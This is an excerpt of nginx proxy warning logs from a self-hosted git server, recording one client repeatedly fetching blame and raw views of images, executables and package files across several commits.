+2026/02/17 13:57:36 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/14/0000014147 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" +2026/02/17 13:57:45 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/14/0000014148 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" +2026/02/17 13:57:54 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/14/0000014149 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" +2026/02/17 13:57:56 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/15/0000014150 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom2.png" +2026/02/17 13:57:57 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/15/0000014151 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" +2026/02/17 13:58:09 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/15/0000014152 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" +2026/02/17 13:58:37 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/15/0000014153 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" +2026/02/17 13:58:40 [warn] 920#920: *51268 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/15/0000014154 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +2026/02/17 13:59:52 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/15/0000014155 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" +2026/02/17 13:59:59 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/15/0000014156 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" +2026/02/17 14:00:27 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/15/0000014157 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" +2026/02/17 14:00:36 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/15/0000014158 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" +2026/02/17 14:00:44 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/15/0000014159 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +2026/02/17 14:00:58 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/16/0000014160 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" +2026/02/17 14:01:41 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/16/0000014161 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" +2026/02/17 14:01:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/16/0000014162 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" +2026/02/17 14:02:23 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/16/0000014163 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" +2026/02/17 14:02:34 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/16/0000014164 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +2026/02/17 14:02:41 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/16/0000014165 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" +2026/02/17 14:02:48 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000014166 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" +2026/02/17 14:03:53 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/16/0000014167 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:04:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/16/0000014168 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +2026/02/17 14:04:55 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/16/0000014169 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" +2026/02/17 14:05:02 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/17/0000014170 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" +2026/02/17 14:05:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/17/0000014171 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" +2026/02/17 14:05:18 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/17/0000014172 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" +2026/02/17 14:05:20 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/17/0000014173 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" +2026/02/17 14:05:26 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/17/0000014174 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" +2026/02/17 14:05:32 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/17/0000014175 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" +2026/02/17 14:05:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/17/0000014176 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +2026/02/17 14:05:52 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/17/0000014177 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +2026/02/17 14:06:01 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/17/0000014178 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" +2026/02/17 14:06:08 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/17/0000014179 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" +2026/02/17 14:06:15 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/18/0000014180 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" +2026/02/17 14:06:22 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/18/0000014181 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" +2026/02/17 14:06:30 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/18/0000014182 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" +2026/02/17 14:06:37 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/18/0000014183 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" +2026/02/17 14:06:45 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/18/0000014184 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" +2026/02/17 14:06:48 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/18/0000014185 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" +2026/02/17 14:07:54 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/18/0000014186 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" +2026/02/17 14:08:01 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/18/0000014187 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" +2026/02/17 14:08:08 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/18/0000014188 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: 